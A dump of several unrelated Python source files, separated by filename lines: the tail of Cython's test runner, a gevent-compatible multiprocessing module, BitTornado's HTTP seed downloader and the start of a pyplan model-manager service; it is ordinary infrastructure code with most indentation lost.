diff = subprocess_output(['git', 'diff', '--stat']).strip()
if head_commit != version_commit:
full_version += " " + head_commit
if diff:
full_version += ' + uncommitted changes'
finally:
os.chdir(old_dir)
return full_version
_orig_stdout, _orig_stderr = sys.stdout, sys.stderr
def flush_and_terminate(status):
try:
_orig_stdout.flush()
_orig_stderr.flush()
finally:
os._exit(status)
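# Command-line entry point: parses the options, optionally fans the run out
# into parallel shards, and aggregates statistics and exit codes.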
def main():
global DISTDIR, WITH_CYTHON
# Set an environment variable to the top directory
os.environ['CYTHON_PROJECT_DIR'] = os.path.abspath(os.path.dirname(__file__))
DISTDIR = os.path.join(os.getcwd(), os.path.dirname(sys.argv[0]))
from Cython.Compiler import DebugFlags
args = []
for arg in sys.argv[1:]:
if arg.startswith('--debug') and arg[2:].replace('-', '_') in dir(DebugFlags):
setattr(DebugFlags, arg[2:].replace('-', '_'), True)
else:
args.append(arg)
from optparse import OptionParser
parser = OptionParser()
parser.add_option("--no-cleanup", dest="cleanup_workdir",
action="store_false", default=True,
help="do not delete the generated C files (allows passing --no-cython on next run)")
parser.add_option("--no-cleanup-sharedlibs", dest="cleanup_sharedlibs",
action="store_false", default=True,
help="do not delete the generated shared library files (allows manual module experimentation)")
parser.add_option("--no-cleanup-failures", dest="cleanup_failures",
action="store_false", default=True,
help="enable --no-cleanup and --no-cleanup-sharedlibs for failed tests only")
parser.add_option("--no-cython", dest="with_cython",
action="store_false", default=True,
help="do not run the Cython compiler, only the C compiler")
parser.add_option("--compiler", dest="compiler", default=None,
help="C compiler type")
backend_list = ','.join(BACKENDS)
parser.add_option("--backends", dest="backends", default=backend_list,
help="select backends to test (default: %s)" % backend_list)
parser.add_option("--no-c", dest="use_c",
action="store_false", default=True,
help="do not test C compilation backend")
parser.add_option("--no-cpp", dest="use_cpp",
action="store_false", default=True,
help="do not test C++ compilation backend")
parser.add_option("--no-unit", dest="unittests",
action="store_false", default=True,
help="do not run the unit tests")
parser.add_option("--no-doctest", dest="doctests",
action="store_false", default=True,
help="do not run the doctests")
parser.add_option("--no-file", dest="filetests",
action="store_false", default=True,
help="do not run the file based tests")
parser.add_option("--no-pyregr", dest="pyregr",
action="store_false", default=True,
help="do not run the regression tests of CPython in tests/pyregr/")
parser.add_option("--no-examples", dest="examples",
action="store_false", default=True,
help="Do not run the documentation tests in the examples directory.")
parser.add_option("--no-code-style", dest="code_style",
action="store_false", default=True,
help="Do not run the code style (PEP8) checks.")
parser.add_option("--cython-only", dest="cython_only",
action="store_true", default=False,
help="only compile pyx to c, do not run C compiler or run the tests")
parser.add_option("--no-refnanny", dest="with_refnanny",
action="store_false", default=True,
help="do not regression test reference counting")
parser.add_option("--no-fork", dest="fork",
action="store_false", default=True,
help="do not fork to run tests")
parser.add_option("--sys-pyregr", dest="system_pyregr",
action="store_true", default=False,
help="run the regression tests of the CPython installation")
parser.add_option("-x", "--exclude", dest="exclude",
action="append", metavar="PATTERN",
help="exclude tests matching the PATTERN")
parser.add_option("-j", "--shard_count", dest="shard_count", metavar="N",
type=int, default=1,
help="shard this run into several parallel runs")
parser.add_option("--shard_num", dest="shard_num", metavar="K",
type=int, default=-1,
help="test only this single shard")
parser.add_option("--profile", dest="profile",
action="store_true", default=False,
help="enable profiling of the tests")
parser.add_option("-C", "--coverage", dest="coverage",
action="store_true", default=False,
help="collect source coverage data for the Compiler")
parser.add_option("--coverage-xml", dest="coverage_xml",
action="store_true", default=False,
help="collect source coverage data for the Compiler in XML format")
parser.add_option("--coverage-html", dest="coverage_html",
action="store_true", default=False,
help="collect source coverage data for the Compiler in HTML format")
parser.add_option("-A", "--annotate", dest="annotate_source",
action="store_true", default=True,
help="generate annotated HTML versions of the test source files")
parser.add_option("--no-annotate", dest="annotate_source",
action="store_false",
help="do not generate annotated HTML versions of the test source files")
parser.add_option("-v", "--verbose", dest="verbosity",
action="count", default=0,
help="display test progress, pass twice to print test names")
parser.add_option("-T", "--ticket", dest="tickets",
action="append",
help="a bug ticket number to run the respective test in 'tests/*'")
parser.add_option("-3", dest="language_level",
action="store_const", const=3, default=2,
help="set language level to Python 3 (useful for running the CPython regression tests)'")
parser.add_option("--xml-output", dest="xml_output_dir", metavar="DIR",
help="write test results in XML to directory DIR")
parser.add_option("--exit-ok", dest="exit_ok", default=False,
action="store_true",
help="exit without error code even on test failures")
parser.add_option("--failfast", dest="failfast", default=False,
action="store_true",
help="stop on first failure or error")
parser.add_option("--root-dir", dest="root_dir", default=os.path.join(DISTDIR, 'tests'),
help=("Directory to look for the file based "
"tests (the ones which are deactivated with '--no-file'."))
parser.add_option("--examples-dir", dest="examples_dir",
default=os.path.join(DISTDIR, 'docs', 'examples'),
help="Directory to look for documentation example tests")
parser.add_option("--work-dir", dest="work_dir", default=os.path.join(os.getcwd(), 'TEST_TMP'),
help="working directory")
parser.add_option("--cython-dir", dest="cython_dir", default=os.getcwd(),
help="Cython installation directory (default: use local source version)")
parser.add_option("--debug", dest="for_debugging", default=False, action="store_true",
help="configure for easier use with a debugger (e.g. gdb)")
parser.add_option("--pyximport-py", dest="pyximport_py", default=False, action="store_true",
help="use pyximport to automatically compile imported .pyx and .py files")
parser.add_option("--watermark", dest="watermark", default=None,
help="deterministic generated by string")
parser.add_option("--use_common_utility_dir", default=False, action="store_true")
parser.add_option("--use_formal_grammar", default=False, action="store_true")
parser.add_option("--test_determinism", default=False, action="store_true",
help="test whether Cython's output is deterministic")
parser.add_option("--pythran-dir", dest="pythran_dir", default=None,
help="specify Pythran include directory. This will run the C++ tests using Pythran backend for Numpy")
parser.add_option("--no-capture", dest="capture", default=True, action="store_false",
help="do not capture stdout, stderr in srctree tests. Makes pdb.set_trace interactive")
parser.add_option("--limited-api", dest="limited_api", default=False, action="store_true",
help="Compiles Cython using CPython's LIMITED_API")
options, cmd_args = parser.parse_args(args)
if options.with_cython and sys.version_info[0] >= 3:
sys.path.insert(0, options.cython_dir)
    # The code style check needs recursive glob ('**' wildcard), which requires
    # Python 3.5+, and is skipped when explicit test selectors are given.
if sys.version_info < (3, 5) or cmd_args:
options.code_style = False
WITH_CYTHON = options.with_cython
coverage = None
if options.coverage or options.coverage_xml or options.coverage_html:
if not WITH_CYTHON:
options.coverage = options.coverage_xml = options.coverage_html = False
elif options.shard_num == -1:
print("Enabling coverage analysis")
from coverage import coverage as _coverage
coverage = _coverage(branch=True)
coverage.erase()
coverage.start()
if options.xml_output_dir:
shutil.rmtree(options.xml_output_dir, ignore_errors=True)
if options.capture:
keep_alive_interval = 10
else:
keep_alive_interval = None
if options.shard_count > 1 and options.shard_num == -1:
import multiprocessing
pool = multiprocessing.Pool(options.shard_count)
tasks = [(options, cmd_args, shard_num) for shard_num in range(options.shard_count)]
errors = []
# NOTE: create process pool before time stamper thread to avoid forking issues.
total_time = time.time()
stats = Stats()
with time_stamper_thread(interval=keep_alive_interval):
for shard_num, shard_stats, return_code in pool.imap_unordered(runtests_callback, tasks):
if return_code != 0:
errors.append(shard_num)
sys.stderr.write("FAILED (%s/%s)\n" % (shard_num, options.shard_count))
sys.stderr.write("ALL DONE (%s/%s)\n" % (shard_num, options.shard_count))
stats.update(shard_stats)
pool.close()
pool.join()
total_time = time.time() - total_time
sys.stderr.write("Sharded tests run in %d seconds (%.1f minutes)\n" % (round(total_time), total_time / 60.))
if errors:
sys.stderr.write("Errors for shards %s\n" % ", ".join([str(e) for e in errors]))
return_code = 1
else:
return_code = 0
else:
with time_stamper_thread(interval=keep_alive_interval):
_, stats, return_code = runtests(options, cmd_args, coverage)
if coverage:
if options.shard_count > 1 and options.shard_num == -1:
coverage.combine()
coverage.stop()
stats.print_stats(sys.stderr)
if coverage:
save_coverage(coverage, options)
sys.stderr.write("ALL DONE\n")
sys.stderr.flush()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(return_code)
else:
sys.exit(return_code)
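# Illustrative invocation sketch (flag spellings assumed from the option
# destinations used above, not verified against the full option list): the
# sharding branch above fans the suite out over a multiprocessing.Pool, e.g.
#
#   python runtests.py --shard_count=4 --backends=c,cpp
#
# while a single shard can be re-run in isolation on one CI worker with
#
#   python runtests.py --shard_count=4 --shard_num=2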
@contextmanager
def time_stamper_thread(interval=10):
"""
Print regular time stamps into the build logs to find slow tests.
@param interval: time interval in seconds
"""
if not interval or interval < 0:
# Do nothing
yield
return
try:
_xrange = xrange
except NameError:
_xrange = range
import threading
import datetime
from time import sleep
interval = _xrange(interval * 4)
now = datetime.datetime.now
stop = False
# We capture stderr in some places.
# => make sure we write to the real (original) stderr of the test runner.
stderr = os.dup(2)
def write(s):
os.write(stderr, s if type(s) is bytes else s.encode('ascii'))
def time_stamper():
while True:
for _ in interval:
if stop:
return
sleep(1./4)
write('\n#### %s\n' % now())
thread = threading.Thread(target=time_stamper, name='time_stamper')
thread.setDaemon(True) # Py2 ...
thread.start()
try:
yield
finally:
stop = True
thread.join()
os.close(stderr)
def configure_cython(options):
global CompilationOptions, pyrex_default_options, cython_compile
from Cython.Compiler.Options import \
CompilationOptions, \
default_options as pyrex_default_options
from Cython.Compiler.Options import _directive_defaults as directive_defaults
from Cython.Compiler import Errors
Errors.LEVEL = 0 # show all warnings
from Cython.Compiler import Options
Options.generate_cleanup_code = 3 # complete cleanup code
from Cython.Compiler import DebugFlags
DebugFlags.debug_temp_code_comments = 1
pyrex_default_options['formal_grammar'] = options.use_formal_grammar
if options.profile:
directive_defaults['profile'] = True
if options.watermark:
import Cython.Compiler.Version
Cython.Compiler.Version.watermark = options.watermark
def save_coverage(coverage, options):
if options.coverage:
coverage.report(show_missing=0)
if options.coverage_xml:
coverage.xml_report(outfile="coverage-report.xml")
if options.coverage_html:
coverage.html_report(directory="coverage-report-html")
def runtests_callback(args):
options, cmd_args, shard_num = args
options.shard_num = shard_num
return runtests(options, cmd_args)
def runtests(options, cmd_args, coverage=None):
WITH_CYTHON = options.with_cython
ROOTDIR = os.path.abspath(options.root_dir)
WORKDIR = os.path.abspath(options.work_dir)
if WITH_CYTHON:
configure_cython(options)
xml_output_dir = options.xml_output_dir
if options.shard_num > -1:
WORKDIR = os.path.join(WORKDIR, str(options.shard_num))
if xml_output_dir:
xml_output_dir = os.path.join(xml_output_dir, 'shard-%03d' % options.shard_num)
# RUN ALL TESTS!
UNITTEST_MODULE = "Cython"
UNITTEST_ROOT = os.path.join(os.path.dirname(__file__), UNITTEST_MODULE)
if WITH_CYTHON:
if os.path.exists(WORKDIR):
for path in os.listdir(WORKDIR):
if path in ("support", "Cy3"): continue
shutil.rmtree(os.path.join(WORKDIR, path), ignore_errors=True)
if not os.path.exists(WORKDIR):
os.makedirs(WORKDIR)
if options.shard_num <= 0:
sys.stderr.write("Python %s\n" % sys.version)
sys.stderr.write("\n")
if WITH_CYTHON:
sys.stderr.write("Running tests against Cython %s\n" % get_version())
else:
sys.stderr.write("Running tests without Cython.\n")
if options.for_debugging:
options.cleanup_workdir = False
options.cleanup_sharedlibs = False
options.fork = False
if WITH_CYTHON and include_debugger:
from Cython.Compiler.Options import default_options as compiler_default_options
compiler_default_options['gdb_debug'] = True
compiler_default_options['output_dir'] = os.getcwd()
if IS_PYPY:
if options.with_refnanny:
sys.stderr.write("Disabling refnanny in PyPy\n")
options.with_refnanny = False
if options.with_refnanny:
from pyximport.pyxbuild import pyx_to_dll
libpath = pyx_to_dll(os.path.join("Cython", "Runtime", "refnanny.pyx"),
build_in_temp=True,
pyxbuild_dir=os.path.join(WORKDIR, "support"))
sys.path.insert(0, os.path.split(libpath)[0])
CFLAGS.append("-DCYTHON_REFNANNY=1")
if options.limited_api:
CFLAGS.append("-DCYTHON_LIMITED_API=1")
CFLAGS.append('-Wno-unused-function')
if xml_output_dir and options.fork:
# XML output and forked testing don't currently work together
sys.stderr.write("Disabling forked testing to support XML test output\n")
options.fork = False
if WITH_CYTHON:
sys.stderr.write("Using Cython language level %d.\n" % options.language_level)
test_bugs = False
if options.tickets:
for ticket_number in options.tickets:
test_bugs = True
cmd_args.append('ticket:%s' % ticket_number)
if not test_bugs:
for selector in cmd_args:
if selector.startswith('bugs'):
test_bugs = True
selectors = [ string_selector(r) for r in cmd_args ]
verbose_excludes = selectors or options.verbosity >= 2
if not selectors:
selectors = [ lambda x, tags=None: True ]
# Check which external modules are not present and exclude tests
# which depend on them (by prefix)
missing_dep_excluder = MissingDependencyExcluder(EXT_DEP_MODULES)
version_dep_excluder = VersionDependencyExcluder(VER_DEP_MODULES)
exclude_selectors = [missing_dep_excluder, version_dep_excluder] # want to print msg at exit
try:
import IPython.core.release
if list(IPython.core.release._ver) < [1, 0, 0]:
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('IPython'))
try:
raise ImportError("Jedi typer is currently broken, see GH#1845")
import jedi
if not ([0, 9] <= list(map(int, re.findall('[0-9]+', jedi.__version__ or '0')))):
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('Jedi'))
if options.exclude:
exclude_selectors += [ string_selector(r) for r in options.exclude ]
if not COMPILER_HAS_INT128 or not IS_CPYTHON:
exclude_selectors += [RegExSelector('int128')]
if options.shard_num > -1:
exclude_selectors.append(ShardExcludeSelector(options.shard_num, options.shard_count))
if not test_bugs:
bug_files = [
('bugs.txt', True),
('pypy_bugs.txt', IS_PYPY),
('limited_api_bugs.txt', options.limited_api),
('windows_bugs.txt', sys.platform == 'win32'),
('cygwin_bugs.txt', sys.platform == 'cygwin')
]
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
for bugs_file_name, condition in bug_files if condition
]
global COMPILER
if options.compiler:
COMPILER = options.compiler
selected_backends = [ name.strip() for name in options.backends.split(',') if name.strip() ]
backends = []
for backend in selected_backends:
if backend == 'c' and not options.use_c:
continue
elif backend == 'cpp' and not options.use_cpp:
continue
elif backend not in BACKENDS:
sys.stderr.write("Unknown backend requested: '%s' not one of [%s]\n" % (
backend, ','.join(BACKENDS)))
sys.exit(1)
backends.append(backend)
if options.shard_num <= 0:
sys.stderr.write("Backends: %s\n" % ','.join(backends))
languages = backends
if 'TRAVIS' in os.environ and sys.platform == 'darwin' and 'cpp' in languages:
bugs_file_name = 'travis_macos_cpp_bugs.txt'
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
]
if options.use_common_utility_dir:
common_utility_dir = os.path.join(WORKDIR, 'utility_code')
if not os.path.exists(common_utility_dir):
os.makedirs(common_utility_dir)
else:
common_utility_dir = None
sys.stderr.write("\n")
test_suite = unittest.TestSuite()
stats = Stats()
if options.unittests:
collect_unittests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.doctests:
collect_doctests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.filetests and languages:
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir, add_embedded_test=True, stats=stats)
test_suite.addTest(filetests.build_suite())
if options.examples and languages:
for subdirectory in glob.glob(os.path.join(options.examples_dir, "*/")):
filetests = TestBuilder(subdirectory, WORKDIR, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir,
default_mode='compile', stats=stats)
test_suite.addTest(filetests.build_suite())
if options.system_pyregr and languages:
sys_pyregr_dir = os.path.join(sys.prefix, 'lib', 'python'+sys.version[:3], 'test')
if not os.path.isdir(sys_pyregr_dir):
sys_pyregr_dir = os.path.join(os.path.dirname(sys.executable), 'Lib', 'test') # source build
if os.path.isdir(sys_pyregr_dir):
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, True, languages, test_bugs,
sys.version_info[0], common_utility_dir, stats=stats)
sys.stderr.write("Including CPython regression tests in %s\n" % sys_pyregr_dir)
test_suite.addTest(filetests.handle_directory(sys_pyregr_dir, 'pyregr'))
if options.code_style and options.shard_num <= 0:
try:
import pycodestyle
except ImportError:
# Hack to make the exclusion visible.
missing_dep_excluder.tests_missing_deps.append('TestCodeFormat')
else:
test_suite.addTest(TestCodeFormat(options.cython_dir))
if xml_output_dir:
from Cython.Tests.xmlrunner import XMLTestRunner
if not os.path.exists(xml_output_dir):
try:
os.makedirs(xml_output_dir)
except OSError:
pass # concurrency issue?
test_runner = XMLTestRunner(output=xml_output_dir,
verbose=options.verbosity > 0)
if options.failfast:
sys.stderr.write("--failfast not supported with XML runner\n")
else:
text_runner_options = {}
if options.failfast:
text_runner_options['failfast'] = True
test_runner = unittest.TextTestRunner(verbosity=options.verbosity, **text_runner_options)
if options.pyximport_py:
from pyximport import pyximport
pyximport.install(pyimport=True, build_dir=os.path.join(WORKDIR, '_pyximport'),
load_py_module_on_import_failure=True, inplace=True)
try:
gc.set_debug(gc.DEBUG_UNCOLLECTABLE)
except AttributeError:
pass # not available on PyPy
result = test_runner.run(test_suite)
if common_utility_dir and options.shard_num < 0 and options.cleanup_workdir:
shutil.rmtree(common_utility_dir)
if missing_dep_excluder.tests_missing_deps:
sys.stderr.write("Following tests excluded because of missing dependencies on your system:\n")
for test in missing_dep_excluder.tests_missing_deps:
sys.stderr.write(" %s\n" % test)
if options.with_refnanny:
import refnanny
sys.stderr.write("\n".join([repr(x) for x in refnanny.reflog]))
if options.exit_ok:
return options.shard_num, stats, 0
else:
return options.shard_num, stats, not result.wasSuccessful()
if __name__ == '__main__':
try:
main()
except Exception:
traceback.print_exc()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(1)
sys.exit(1)
|
gmultiprocessing.py
|
# -*- coding: utf-8 -*-
"""
Add compatibility for gevent and multiprocessing.
Source based on project GIPC 0.6.0
https://bitbucket.org/jgehrcke/gipc/
"""
import os, sys, signal, multiprocessing, multiprocessing.process, multiprocessing.reduction
gevent=None
geventEvent=None
def _tryGevent():
global gevent, geventEvent
if gevent and geventEvent: return False
try:
import gevent
from gevent import event as geventEvent
return True
except ImportError:
raise ValueError('gevent not found')
def Process(target, args=(), kwargs={}, name=None): # daemon=None
# check if gevent is available
try: _tryGevent()
except ValueError:
print('Gevent not found, switching to native multiprocessing')
return multiprocessing.Process(target=target, args=args, kwargs=kwargs, name=name)
if int(gevent.__version__[0])<1:
raise NotImplementedError('Gmultiprocessing supports only gevent>=1.0, your version %s'%gevent.__version__)
if not isinstance(args, tuple):
raise TypeError('<args> must be a tuple')
if not isinstance(kwargs, dict):
raise TypeError('<kwargs> must be a dict')
p = _GProcess(
target=_child,
name=name,
kwargs={"target": target, "args": args, "kwargs": kwargs}
)
# if daemon is not None: p.daemon = daemon
return p
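# Minimal usage sketch (illustrative only; the helper below is not part of the
# original module and assumes gevent is installed): spawn a child through the
# gevent-aware Process() factory and wait for it cooperatively, so other
# greenlets keep running while the parent waits.
def _example_spawn_and_join():
    def work(x, y):
        print(x + y)
    p = Process(target=work, args=(1, 2))
    p.start()
    p.join(timeout=10)  # cooperative wait; does not block the gevent hub
    return p.exitcode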
def _child(target, args, kwargs):
"""Wrapper function that runs in child process. Resets gevent/libev state
and executes user-given function.
"""
_tryGevent()
_reset_signal_handlers()
gevent.reinit()
hub = gevent.get_hub()
del hub.threadpool
hub._threadpool = None
hub.destroy(destroy_loop=True)
h = gevent.get_hub(default=True)
assert h.loop.default, 'Could not create libev default event loop.'
target(*args, **kwargs)
class _GProcess(multiprocessing.Process):
"""
Compatible with the ``multiprocessing.Process`` API.
"""
try:
from multiprocessing.forking import Popen as mp_Popen
except ImportError:
# multiprocessing's internal structure has changed from 3.3 to 3.4.
from multiprocessing.popen_fork import Popen as mp_Popen
# Monkey-patch and forget about the name.
mp_Popen.poll = lambda *a, **b: None
del mp_Popen
def start(self):
_tryGevent()
# Start grabbing SIGCHLD within libev event loop.
gevent.get_hub().loop.install_sigchld()
# Run new process (based on `fork()` on POSIX-compliant systems).
super(_GProcess, self).start()
# The occurrence of SIGCHLD is recorded asynchronously in libev.
# This guarantees proper behavior even if the child watcher is
# started after the child exits. Start child watcher now.
self._sigchld_watcher = gevent.get_hub().loop.child(self.pid)
self._returnevent = gevent.event.Event()
self._sigchld_watcher.start(self._on_sigchld, self._sigchld_watcher)
def _on_sigchld(self, watcher):
"""Callback of libev child watcher. Called when libev event loop
catches corresponding SIGCHLD signal.
"""
watcher.stop()
# Status evaluation copied from `multiprocessing.forking` in Py2.7.
if os.WIFSIGNALED(watcher.rstatus):
self._popen.returncode = -os.WTERMSIG(watcher.rstatus)
else:
assert os.WIFEXITED(watcher.rstatus)
self._popen.returncode = os.WEXITSTATUS(watcher.rstatus)
self._returnevent.set()
def is_alive(self):
assert self._popen is not None, "Process not yet started."
if self._popen.returncode is None:
return True
return False
@property
def exitcode(self):
if self._popen is None:
return None
return self._popen.returncode
def __repr__(self):
exitcodedict = multiprocessing.process._exitcode_to_name
status = 'started'
if self._parent_pid != os.getpid(): status = 'unknown'
elif self.exitcode is not None: status = self.exitcode
if status == 0: status = 'stopped'
elif isinstance(status, int):
status = 'stopped[%s]' % exitcodedict.get(status, status)
return '<%s(%s, %s%s)>' % (type(self).__name__, self._name, status, self.daemon and ' daemon' or '')
def join(self, timeout=None):
"""
Wait cooperatively until child process terminates or timeout occurs.
:arg timeout: ``None`` (default) or a time in seconds. The method
simply returns upon timeout expiration. The state of the process
has to be identified via ``is_alive()``.
"""
assert self._parent_pid == os.getpid(), "I'm not parent of this child."
assert self._popen is not None, 'Can only join a started process.'
# Resemble multiprocessing's join() method while replacing
# `self._popen.wait(timeout)` with
# `self._returnevent.wait(timeout)`
self._returnevent.wait(timeout)
if self._popen.returncode is not None:
if hasattr(multiprocessing.process, '_children'): # This is for Python 3.4.
kids = multiprocessing.process._children
else: # For Python 2.6, 2.7, 3.3.
kids = multiprocessing.process._current_process._children
kids.discard(self)
# Inspect signal module for signals whose action is to be restored to the default action right after fork.
_signals_to_reset = [getattr(signal, s) for s in
set([s for s in dir(signal) if s.startswith("SIG")]) -
# Exclude constants that are not signals such as SIG_DFL and SIG_BLOCK.
set([s for s in dir(signal) if s.startswith("SIG_")]) -
# Leave handlers for SIG(STOP/KILL/PIPE) untouched.
set(['SIGSTOP', 'SIGKILL', 'SIGPIPE'])]
def _reset_signal_handlers():
for s in _signals_to_reset:
if s < signal.NSIG:
signal.signal(s, signal.SIG_DFL)
PY3 = sys.version_info[0] == 3
if PY3:
def _reraise(tp, value, tb=None):
if value is None:
value = tp()
if value.__traceback__ is not tb:
raise value.with_traceback(tb)
raise value
else:
def __exec(_code_, _globs_=None, _locs_=None):
"""Execute code in a namespace."""
if _globs_ is None:
frame = sys._getframe(1)
_globs_ = frame.f_globals
if _locs_ is None:
_locs_ = frame.f_locals
del frame
elif _locs_ is None:
_locs_ = _globs_
exec("""exec _code_ in _globs_, _locs_""")
__exec("""def _reraise(tp, value, tb=None): raise tp, value, tb""")
|
HTTPDownloader.py
|
# Written by John Hoffman
# see LICENSE.txt for license information
from horde.BitTornado.CurrentRateMeasure import Measure
from random import randint
from urlparse import urlparse
from httplib import HTTPConnection
from urllib import quote
from threading import Thread
from horde.BitTornado.__init__ import product_name,version_short
try:
True
except:
True = 1
False = 0
EXPIRE_TIME = 60 * 60
VERSION = product_name+'/'+version_short
class haveComplete:
def complete(self):
return True
def __getitem__(self, x):
return True
haveall = haveComplete()
class SingleDownload:
def __init__(self, downloader, url):
self.downloader = downloader
self.baseurl = url
try:
(scheme, self.netloc, path, pars, query, fragment) = urlparse(url)
except:
self.downloader.errorfunc('cannot parse http seed address: '+url)
return
if scheme != 'http':
self.downloader.errorfunc('http seed url not http: '+url)
return
try:
self.connection = HTTPConnection(self.netloc)
except:
self.downloader.errorfunc('cannot connect to http seed: '+url)
return
self.seedurl = path
if pars:
self.seedurl += ';'+pars
self.seedurl += '?'
if query:
self.seedurl += query+'&'
self.seedurl += 'info_hash='+quote(self.downloader.infohash)
self.measure = Measure(downloader.max_rate_period)
self.index = None
self.url = ''
self.requests = []
self.request_size = 0
self.endflag = False
self.error = None
self.retry_period = 30
self._retry_period = None
self.errorcount = 0
self.goodseed = False
self.active = False
self.cancelled = False
self.resched(randint(2,10))
def resched(self, len = None):
if len is None:
len = self.retry_period
if self.errorcount > 3:
len = len * (self.errorcount - 2)
self.downloader.rawserver.add_task(self.download, len)
def _want(self, index):
if self.endflag:
return self.downloader.storage.do_I_have_requests(index)
else:
return self.downloader.storage.is_unstarted(index)
def download(self):
self.cancelled = False
if self.downloader.picker.am_I_complete():
self.downloader.downloads.remove(self)
return
self.index = self.downloader.picker.next(haveall, self._want)
if ( self.index is None and not self.endflag
and not self.downloader.peerdownloader.has_downloaders() ):
self.endflag = True
self.index = self.downloader.picker.next(haveall, self._want)
if self.index is None:
self.endflag = True
self.resched()
else:
self.url = ( self.seedurl+'&piece='+str(self.index) )
self._get_requests()
if self.request_size < self.downloader.storage._piecelen(self.index):
self.url += '&ranges='+self._request_ranges()
rq = Thread(target = self._request)
rq.setDaemon(False)
rq.start()
self.active = True
def _request(self):
import encodings.ascii
import encodings.punycode
import encodings.idna
self.error = None
self.received_data = None
try:
self.connection.request('GET',self.url, None,
{'User-Agent': VERSION})
r = self.connection.getresponse()
self.connection_status = r.status
self.received_data = r.read()
except Exception, e:
self.error = 'error accessing http seed: '+str(e)
try:
self.connection.close()
except:
pass
try:
self.connection = HTTPConnection(self.netloc)
except:
self.connection = None # will cause an exception and retry next cycle
self.downloader.rawserver.add_task(self.request_finished)
def request_finished(self):
self.active = False
if self.error is not None:
if self.goodseed:
self.downloader.errorfunc(self.error)
self.errorcount += 1
if self.received_data:
self.errorcount = 0
if not self._got_data():
self.received_data = None
if not self.received_data:
self._release_requests()
self.downloader.peerdownloader.piece_flunked(self.index)
if self._retry_period:
self.resched(self._retry_period)
self._retry_period = None
return
self.resched()
def _got_data(self):
if self.connection_status == 503: # seed is busy
try:
self.retry_period = max(int(self.received_data),5)
except:
pass
return False
if self.connection_status != 200:
self.errorcount += 1
return False
self._retry_period = 1
if len(self.received_data) != self.request_size:
if self.goodseed:
self.downloader.errorfunc('corrupt data from http seed - redownloading')
return False
self.measure.update_rate(len(self.received_data))
self.downloader.measurefunc(len(self.received_data))
if self.cancelled:
return False
if not self._fulfill_requests():
return False
if not self.goodseed:
self.goodseed = True
self.downloader.seedsfound += 1
if self.downloader.storage.do_I_have(self.index):
self.downloader.picker.complete(self.index)
self.downloader.peerdownloader.check_complete(self.index)
self.downloader.gotpiecefunc(self.index)
return True
def _get_requests(self):
self.requests = []
self.request_size = 0L
while self.downloader.storage.do_I_have_requests(self.index):
r = self.downloader.storage.new_request(self.index)
self.requests.append(r)
self.request_size += r[1]
self.requests.sort()
def _fulfill_requests(self):
start = 0L
success = True
while self.requests:
begin, length = self.requests.pop(0)
if not self.downloader.storage.piece_came_in(self.index, begin,
self.received_data[start:start+length]):
success = False
break
start += length
return success
def _release_requests(self):
for begin, length in self.requests:
self.downloader.storage.request_lost(self.index, begin, length)
self.requests = []
def _request_ranges(self):
s = ''
begin, length = self.requests[0]
for begin1, length1 in self.requests[1:]:
if begin + length == begin1:
length += length1
continue
else:
if s:
s += ','
s += str(begin)+'-'+str(begin+length-1)
begin, length = begin1, length1
if s:
s += ','
s += str(begin)+'-'+str(begin+length-1)
return s
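# Illustrative worked example (hypothetical request list, not from the original
# source): if self.requests is [(0, 16384), (16384, 16384), (49152, 16384)],
# the first two adjacent chunks are coalesced and _request_ranges() returns
# "0-32767,49152-65535", which download() appends to the URL as "&ranges=...".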
class HTTPDownloader:
def __init__(self, storage, picker, rawserver,
finflag, errorfunc, peerdownloader,
max_rate_period, infohash, measurefunc, gotpiecefunc):
self.storage = storage
self.picker = picker
self.rawserver = rawserver
self.finflag = finflag
self.errorfunc = errorfunc
self.peerdownloader = peerdownloader
self.infohash = infohash
self.max_rate_period = max_rate_period
self.gotpiecefunc = gotpiecefunc
self.measurefunc = measurefunc
self.downloads = []
self.seedsfound = 0
def make_download(self, url):
self.downloads.append(SingleDownload(self, url))
return self.downloads[-1]
def get_downloads(self):
if self.finflag.isSet():
return []
return self.downloads
def cancel_piece_download(self, pieces):
for d in self.downloads:
if d.active and d.index in pieces:
d.cancelled = True
|
service.py
|
import base64
import datetime
import os
import random
import re
import sys
import tempfile
import threading
import unicodedata
import zipfile
from itertools import chain
from numbers import Number
from os.path import join
from django.conf import settings
from django.core.files.storage import FileSystemStorage
from rest_framework import exceptions
from pyplan.pyplan.common.baseService import BaseService
from pyplan.pyplan.common.calcEngine import CalcEngine
from pyplan.pyplan.common.utils import _uploadFile
from pyplan.pyplan.department.models import Department
from pyplan.pyplan.filemanager.classes.fileEntry import FileEntry, eFileTypes
from pyplan.pyplan.filemanager.classes.fileEntryData import (FileEntryData,
eSpecialFileType,
eSpecialFolder)
from pyplan.pyplan.modelmanager.classes.eImportType import eImportType
from pyplan.pyplan.modelmanager.classes.modelInfo import ModelInfo
from pyplan.pyplan.modelmanager.classes.modelPreference import ModelPreference
from pyplan.pyplan.security.functions import _getAllSessions
from pyplan.pyplan.ws import sysMsg, ws_settings
class ModelManagerService(BaseService):
# model related methods
def openModel(self, file, forceSingleInstance=False):
"""Open model"""
res = None
found = False
if not forceSingleInstance:
my_sessions = _getAllSessions(self, onlyMySessions=True)
for item_session in my_sessions:
if item_session.currentModelFile == file:
found = True
res = ModelInfo()
res.name = item_session.currentModelName
res.uri = item_session.currentModelFile
res.modelId = item_session.currentModel
res.new_session_key = item_session.session_key
break
if not found:
current_session = self.getSession()
calcEngine = CalcEngine.tryLoadFromAppPool(current_session, file)
res = current_session.modelInfo
